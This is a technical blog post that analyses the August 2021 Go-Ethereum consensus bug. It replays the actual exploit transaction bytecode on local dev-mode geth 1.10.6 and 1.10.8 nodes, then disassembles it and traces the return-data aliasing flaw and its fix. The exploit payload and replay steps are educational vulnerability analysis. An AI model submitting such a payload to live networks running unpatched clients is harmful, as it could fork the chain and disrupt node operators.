On August 27th 2021, a malicious transaction was created on the Ethereum mainnet, targeting a vulnerability in all versions of Go-Ethereum up to 1.10.7. If successful, this could have resulted in a fork of the production network. Fortunately, a fork was avoided because a sufficient number of nodes were already running version 1.10.8 of Go-Ethereum, which had been released as a hotfix three days earlier. Armed with the understanding from my previous posts of how the EVM and in particular calls work internally, we are now in a position to analyze what really happened and how the exploit works.
What happened
On August 24th, the Go-Ethereum developer team rushed to release geth v1.10.8, which was announced as a hotfix for a vulnerability that had been discovered during an audit of the Telos EVM, which is a copy of the Ethereum EVM running on the Telos blockchain. The announcement itself did not disclose any details, but more information has since been posted by other teams and researchers (for instance here).
If you release a hotfix in an open source project, where anybody can simply ask GitHub to create a diff between two releases, the black hats will obviously start to reverse-engineer the changes to understand what the problem was and will try to exploit it. This is exactly what happened in this case as well.
In fact, three days later, on August 27th, one of the Go-Ethereum core developers posted an alert on Twitter, urging node maintainers to upgrade and announcing that an active attempt to exploit the vulnerability had been observed on mainnet. In the same thread, a link to the malicious transaction (with transaction hash 0x1cb6fb36633d270edefc04d048145b4298e67b8aa82a9e5ec4aa1435dd770ce4) on Etherscan was published shortly after. It turns out that the root cause of the issue is related to how geth handles the processing of calls and their return values, and, having gone through all this in the previous posts, we are now in a good position to understand what the problem was. In this section, we will use the details of the malicious transaction to replay it, both with geth 1.10.8 (where the problem has been fixed) and geth 1.10.6 (where the problem still exists), to understand why it has the potential to cause a split of the blockchain. In the next section, we will then analyze the source code to understand the issue and how it has been fixed.
Let us first replay the transaction using geth 1.10.8. I assume that you have copies of geth 1.10.8 and geth 1.10.6 in your path (if not, head over to the project download page and get the binaries for your OS). Our approach will be to create two blockchain data directories, one for each version, so that we start with the same initial state. We will then run the transaction against both versions and observe that the outcomes differ.
There is a little subtlety, though. If you start geth with a fresh data directory, it will also randomly create a new developer account which becomes part of the genesis block. Therefore, running geth twice with different data directories will in general not produce the same initial state. To avoid this, we share the key store between both instances, so that they both use the same developer account. So we will have three directories – geth1108 which will be the data directory for v1.10.8, geth1106 which will be the data directory for v1.10.6, and gethcommon which will contain the key store. We will start with geth v1.10.8 which will also create the developer account for us.
# Assumes that geth1108 and geth1106 are the respective binaries
# and that both are on your PATH
mkdir geth1108
mkdir gethcommon
geth1108 \
--datadir $(pwd)/geth1108/ \
--keystore $(pwd)/gethcommon/ \
--dev \
--http
Once the client is running, let us, for later reference, get the hash of the genesis block. In a separate terminal (but in the same working directory), attach a geth console, and, once the console prompt appears, get the hash value of the genesis block.
geth1108 attach $(pwd)/geth1108/geth.ipc
eth.getBlockByNumber(0).hash
Write down this hash value somewhere. For me, it was 0x3b154292c6ec669d736df498663075cf7140b3aa3f287a5dc6b55477937f8ad6, but when you try this, you will most likely get a different etherbase account and thus a different genesis block and a different hash.
Now let us run the exploit transaction, determine the address of the contract that has been generated and get the contract (runtime) code and the hash of the resulting block.
dev = eth.accounts[0]
input = "0x3034526020600760203460045afa602034343e604034f3"
value = 0
txn = {
"from": dev,
"value": value,
"input": input,
"gas": 200000
}
txnhash = eth.sendTransaction(txn)
// wait until the transaction has been mined, then run
c = eth.getTransactionReceipt(txnhash).contractAddress
eth.getCode(c)
eth.getBlockByNumber(1).hash
Again, write down the hash value of the new block (block 1) and the contract code. Now let us repeat all this with geth 1.10.6. Stop the console and the running instance of geth. Then start a new instance of geth 1.10.6, using, as explained above, a different data directory but the same key store directory.
mkdir geth1106
geth1106 \
--datadir $(pwd)/geth1106/ \
--keystore $(pwd)/gethcommon/ \
--dev \
--http
Looking at the startup messages of the client, you should be able to verify that the developer account is the same as before. Now start the geth console again, this time pointing to the IPC endpoint of the now running geth 1.10.6.
geth1106 attach $(pwd)/geth1106/geth.ipc
Now, repeat the steps above. First, determine the hash value of the genesis block (block 0) and verify that you get the same result as previously. Then, run the code above to also submit the transaction in our new blockchain, and get the code and the hash of the generated block.
You should see that the code generated by geth 1.10.6 is different. In fact, the code produced with geth 1.10.8 should be the contract address (padded to 32 bytes), followed by the last seven bytes of the contract address and filled up with zeros. For geth 1.10.6, the code consists of the first seven bytes of the 32-byte contract address word, followed by the full 32-byte word and again filled up with zeros. Correspondingly, the hash of the new block is different (because the state is different and the state root is part of the block).
So we see that two different versions of the client start with the same state (the genesis block) and run the same transaction, but arrive at a different state after the transaction has been processed. This, of course, is a disaster: if a network consists of nodes with these two versions, the nodes will form two partitions (one running the new version and one running the old version) and the members of the two partitions will disagree about the correct state. Thus, in the worst case, the chain will fork.
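To make the comparison less error-prone than reading hex by eye, the two layouts can be written down for a given address. The following is only a sketch in plain JavaScript (for example for Node.js); the function name expectedCode and the address in the usage line are made up for illustration. It relies on the fact that ADDRESS followed by MSTORE stores the 20-byte address as a 32-byte word, left-padded with zeros, so the "first seven bytes" of that word are always zero.

```javascript
// Build the two 64-byte runtime-code layouts described above for a contract address.
// Hypothetical helper for illustration only; it does not talk to a node.
function expectedCode(address) {
  const addr = address.replace(/^0x/, "").toLowerCase();
  if (addr.length !== 40) throw new Error("expected a 20-byte address");
  // ADDRESS + MSTORE store the address as a 32-byte word, left-padded with zeros
  const word = addr.padStart(64, "0");
  // RETURN hands back 0x40 = 64 bytes, i.e. 128 hex characters
  const pad = (s) => "0x" + s.padEnd(128, "0");
  return {
    // geth 1.10.8: the word, then the last 7 bytes of the word
    fixed: pad(word + word.slice(-14)),
    // geth 1.10.6: the first 7 bytes of the word (zero padding), then the word
    vulnerable: pad(word.slice(0, 14) + word),
  };
}

// Placeholder address; substitute the contract address from your own receipt
const layouts = expectedCode("0x00112233445566778899aabbccddeeff00112233");
console.log(layouts.fixed);
console.log(layouts.vulnerable);
```

Comparing these strings with the output of eth.getCode(c) on each client should tell you which of the two behaviours you are looking at.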
Fortunately, this is not what happened in real life, as apparently a sufficiently large number of nodes had already upgraded to the latest version when the exploit hit the network.
So we have managed to reconstruct the attack and verify that it does, in fact, lead to a potential fork. Let us now try to understand what the problem was and how the exploit works.
Why it happened
To understand what the exploit code is doing, let us disassemble it, using for instance debug.traceBlockByNumber(1)[0].result in the geth console. Here is an opcode view of the input data (which, as we know, will be run as deploy bytecode when the transaction is processed).
ADDRESS
CALLVALUE
MSTORE
PUSH1 0x20
PUSH1 0x07
PUSH1 0x20
CALLVALUE
PUSH1 0x04
GAS
STATICCALL
PUSH1 0x20
CALLVALUE
CALLVALUE
RETURNDATACOPY
PUSH1 0x40
CALLVALUE
RETURN
The first three lines will push the address of the contract being created and the call value (which is zero) onto the stack and run MSTORE, so that the stack will be empty again and the memory will contain the contract address at position 0x0.
Next, the code again sets up the stack, which, when we reach the STATICCALL, will look as follows (items at the top of the stack on the left):
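The opcode view can be cross-checked against the raw input without a running node by decoding the bytes directly. This is a minimal sketch in plain JavaScript (for example for Node.js), not part of geth; the function name disassemble is made up, and the opcode table deliberately covers only the handful of opcodes that occur in this transaction.

```javascript
// Opcodes used by the exploit input; everything else is reported as UNKNOWN.
const OPCODES = {
  0x30: "ADDRESS",
  0x34: "CALLVALUE",
  0x3e: "RETURNDATACOPY",
  0x52: "MSTORE",
  0x5a: "GAS",
  0xf3: "RETURN",
  0xfa: "STATICCALL",
};

function disassemble(hex) {
  const bytes = hex.replace(/^0x/, "").match(/../g).map((b) => parseInt(b, 16));
  const out = [];
  for (let pc = 0; pc < bytes.length; pc++) {
    const op = bytes[pc];
    if (op >= 0x60 && op <= 0x7f) {
      // PUSH1..PUSH32 are followed by (op - 0x5f) bytes of immediate data
      const n = op - 0x5f;
      const data = bytes
        .slice(pc + 1, pc + 1 + n)
        .map((b) => b.toString(16).padStart(2, "0"))
        .join("");
      out.push("PUSH" + n + " 0x" + data);
      pc += n; // skip the immediate bytes
    } else {
      out.push(OPCODES[op] || "UNKNOWN(0x" + op.toString(16) + ")");
    }
  }
  return out;
}

const listing = disassemble("0x3034526020600760203460045afa602034343e604034f3");
console.log(listing.join("\n"));
```

The 23 input bytes decode to 17 instructions; the CALLVALUE directly before RETURN supplies the zero offset for the returned data.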
remaining gas | 0x4 | 0x0 | 0x20 | 0x7 | 0x20
Now we know that a call to address 0x04 invokes the precompiled contract “data copy”. The input is specified by items three and four on the stack, i.e. the 32 bytes at address 0x0, which, as we know, hold the contract address. The output is to be placed at address 0x7. Thus after returning, the memory contains the first 7 bytes of the contract address at 0x0, followed by the full contract address starting at 0x7.
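Note that input and output ranges of this call overlap. The effect on memory can be reproduced with a few lines of plain JavaScript; this is only an illustration under my own assumptions (a 64-byte Uint8Array as a stand-in for EVM memory and a made-up address), not geth code. Uint8Array.copyWithin copies overlapping ranges as if via a temporary buffer, which matches the outcome described above.

```javascript
const toHex = (bytes) =>
  Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");

// First 64 bytes of memory, initially zero
const memory = new Uint8Array(64);
const address = "00112233445566778899aabbccddeeff00112233"; // hypothetical address

// MSTORE at 0x0: 12 zero bytes of padding followed by the 20 address bytes
for (let i = 0; i < 20; i++) {
  memory[12 + i] = parseInt(address.slice(2 * i, 2 * i + 2), 16);
}
const word = toHex(memory.subarray(0, 32));

// Data copy: input is memory[0x0, 0x20), output is written starting at 0x7
memory.copyWithin(0x07, 0x00, 0x20);

console.log(toHex(memory.subarray(0, 7)));  // first 7 bytes of the original word
console.log(toHex(memory.subarray(7, 39))); // the full word, now at offset 0x7
```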
Next, we again see a couple of instructions that prepare the stack, and then we invoke RETURNDATACOPY. Upon reaching this opcode, our stack is as follows (the last item, 0x1, is the success flag that the STATICCALL left on the stack):
0x0 | 0x0 | 0x20 | 0x1
Recall that RETURNDATACOPY is supposed to copy the result of the last call-like operation to memory. In this case, we ask the EVM to copy the result of the last call, i.e. our STATICCALL (which, as we know, is the contract address), to address 0x0. Thus after executing this statement, the memory should contain the contract address at location 0x0, followed by the last seven bytes of the contract address at the beginning of the second 32 byte word. The final RETURN would then return these two words as runtime bytecode, so that the runtime bytecode should be the contract address, followed by the last seven bytes of the contract address repeated. This, in fact, is what you observe when you look at the trace and the contract generated with geth 1.10.8.
Unfortunately, with geth 1.10.6, the trace shows that here, the RETURNDATACOPY does not change the memory content at all. Consequently, the runtime bytecode is the current memory content, i.e. the first seven bytes of the contract address followed by the full contract address. This is the bug that has been discovered and exploited.
Let us now take a look at the Go-Ethereum source code and try to understand what the problem is. In our previous posts (here, here and here) on the inner workings of the EVM, we have already analyzed in detail how a call works internally. We process the STATICCALL in the opStaticCall function where we invoke the StaticCall method of the EVM. Here, we figure out that the target of the call is a precompiled contract, so we call RunPrecompiledContract. At this point in time, the input is a pointer (more precisely, a Go slice) into the memory of the calling contract, starting at offset 0x0, i.e. the contract address.
The implementation of the precompiled contract at address 0x4 now simply returns the exact same pointer again. Thus, when we get back into opStaticCall, the variable ret is now a pointer to offset 0x0 in the contract memory. Next, we copy the return value of the call (the contract address) to its target location in memory, i.e. to offset 0x7.
The problem is that this of course modifies the memory to which ret still points. Thus the value at the memory location pointed to by ret is now no longer the return value of the precompiled contract, but the new, overwritten memory content. Unfortunately, back in the main interpreter loop, we nevertheless use the returned pointer and assign it to the return data buffer (here). Thus the return data buffer now does not contain the original return value of the precompiled contract, as it should, but the already modified memory content. When we now access this with RETURNDATACOPY, we copy this memory content to itself, resulting in the effective no-op that we observe.
In version 1.10.8, this line has been added in opStaticCall which creates a copy of the return value before modifying the memory content, thereby avoiding the problem. Thus, as we can observe, version 1.10.8 correctly returns the actual contract address when executing the RETURNDATACOPY opcode. A nice example of the risks inherent in the use of pointers in any programming language.
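The aliasing at the heart of the bug is easy to reproduce in miniature. The following toy model is my own sketch in plain JavaScript and not the geth code: Uint8Array.subarray returns a view on the same buffer and stands in for the Go slice that still points into EVM memory, while Uint8Array.slice returns an independent copy and stands in for the fix. The function name runExploit, the flag copyReturnValue and the placeholder address bytes are made up for illustration.

```javascript
// Replays the memory traffic of the exploit on a 64-byte toy memory.
function runExploit(addressWord, copyReturnValue) {
  const memory = new Uint8Array(64);
  memory.set(addressWord, 0x00); // ADDRESS, CALLVALUE, MSTORE

  // STATICCALL to 0x4: the precompile hands its input back unchanged,
  // so ret refers to memory[0x0, 0x20) itself rather than to a copy
  let ret = memory.subarray(0x00, 0x20);
  if (copyReturnValue) {
    ret = ret.slice(); // model of the fix: detach the return value from memory
  }
  memory.set(ret, 0x07); // write the call result to its target offset 0x7

  // Back in the interpreter loop, ret becomes the return data buffer
  const returnData = ret;

  // RETURNDATACOPY: copy 0x20 bytes of return data to memory offset 0x0
  memory.set(returnData.subarray(0x00, 0x20), 0x00);

  // RETURN: offset 0x0, size 0x40
  return memory.slice(0x00, 0x40);
}

// 32-byte word: 12 zero bytes, then placeholder address bytes 0x01..0x14
const word = new Uint8Array(32);
for (let i = 0; i < 20; i++) word[12 + i] = i + 1;

const vulnerable = runExploit(word, false); // behaves like geth 1.10.6
const fixed = runExploit(word, true);       // behaves like geth 1.10.8
console.log(Buffer.from(vulnerable).toString("hex"));
console.log(Buffer.from(fixed).toString("hex"));
```

Without the copy, the return data buffer is just a window onto memory that has already been overwritten, so copying it back to offset 0x0 changes nothing; with the copy, the original word is restored at offset 0x0.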
Personally, I was a bit surprised to see this happening, as a related vulnerability was already identified and fixed with v1.9.17 in July 2020. The comparison is interesting because at that time, the developers had chosen not to declare the release a hotfix, and consequently, many miners did not upgrade. The vulnerability was then actually exploited in November 2020, splitting nodes that had not yet been upgraded off from the network. The geth team later conducted a post mortem in which they also explained why they had chosen not to announce the fix in public but to effectively ship it as an unannounced hard fork. In hindsight, this probably was a good decision: after all, almost four months had passed after the release without anyone noticing and exploiting the change. In the current case, where the team chose to make the fix public and to urge operators to upgrade on social media, it took only three days between the release and the exploit, so this will most likely re-ignite the debate on how the team should handle consensus bugs once they have been discovered (and hopefully also a debate about how to better catch this sort of issue in the future).
This closes our post for today. I hope you found it interesting to see what a real-world consensus bug might look like and how it could be exploited. Hope to see you soon.